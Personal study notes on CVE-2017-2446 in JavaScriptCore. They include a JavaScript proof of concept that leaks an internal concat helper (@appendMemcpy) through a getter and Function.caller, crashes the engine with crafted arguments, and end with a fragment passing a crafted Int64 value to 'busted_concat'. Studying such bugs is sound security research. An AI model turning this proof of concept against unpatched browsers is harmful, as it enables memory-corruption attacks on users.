CVE-2017-2446 Study Notes


I studied this by following this link.

var q;
// this is a non-strict chunk of code, so getting the caller is allowed
function g(){
    q = g.caller;
    return 7;
}

var a = [1, 2, 3];
a.length = 4;
// when anything, including the runtime, accesses a[3], g will be called
Object.defineProperty(Array.prototype, "3", {get : g});
// trigger the runtime access of a[3]
[4, 5, 6].concat(a);
// q now is a reference to an internal runtime function
q(0x77777777, 0x77777777, 0); // crash

q is some native function related to concat, and I really wanted to know exactly which one.
By setting breakpoints I found that q calls arrayProtoPrivateFuncAppendMemcpy. I modified the code in Source/JavaScriptCore/builtins/ArrayPrototype.js to add variable printing, rebuilt, and after debugging confirmed that q is @appendMemcpy. The verification output is below.

concat if 1
appendMemcpy Object: 0x1035bdea0 with butterfly 0x1035c5aa8 (0x1035ea320:[Function, {length:100}, NonArray, Proto:0x1035c80a0, Leaf]), ID: 70
concatMemcpy Object: 0x1035bde70 with butterfly 0x1035c5a88 (0x1035ea320:[Function, {length:100}, NonArray, Proto:0x1035c80a0, Leaf]), ID: 70
concatSlowPath Object: 0x1035bded0 with butterfly 0x1035c5ac8 (0x1035e9ea0:[Function, {name:100, length:101}, NonArray, Proto:0x1035c80a0]), ID: 61
concatSlowPath
q Object: 0x1035bdea0 with butterfly 0x1035c5aa8 (0x1035ea320:[Function, {length:100}, NonArray, Proto:0x1035c80a0, Leaf]), ID: 70

In the end this vulnerability crashed when calling the exported concat to join a Symbol and an array. By rights it should not crash.

let x = Symbol("AAAA");

let y = [];
y.push(new Int64('0x000042420000ffff').asDouble());

busted_concat(x, y, 0);